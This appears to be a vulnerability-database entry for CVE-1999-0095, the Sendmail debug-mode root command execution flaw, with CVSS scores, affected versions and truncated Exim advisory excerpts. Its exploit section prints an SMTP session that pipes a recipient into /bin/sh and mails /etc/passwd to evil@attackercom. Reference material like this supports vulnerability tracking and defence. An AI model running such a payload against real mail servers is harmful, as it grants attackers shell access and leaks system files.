10
CVSSv2

CVE-1999-0095

Published: 01/10/1988 Updated: 11/06/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The debug command in Sendmail is enabled, allowing malicious users to execute commands as root.

Vulnerability Trend

Affected Products

Vendor Product Versions
Eric AllmanSendmail5.58

Exploits

220 mailvictimcom SMTP helo attackercom 250 Hello attackercom, pleased to meet you debug 200 OK mail from: </dev/null> 250 OK rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0"> 250 OK data 354 Start mail input; end with <CRLF><CRLF> mail evil@attackercom </etc/passwd 250 OK quit 221 mailvictimcom Terminating The ...

Mailing Lists

Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgm ...
Hi all, On Wed, Jun 05, 2019 at 05:19:44PM +0200, Heiko Schlittermann wrote: As per the distros list policy: Below is an abridged version of our advisory (with all the vulnerability details, but without exploitation details); we will publish the complete version in 24 hours, or as soon as third-party exploits are published, whichever happens fi ...
Qualys Security Advisory The Return of the WIZard: RCE in Exim (CVE-2019-10149) ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default configurations - Default configuration Acknowledgm ...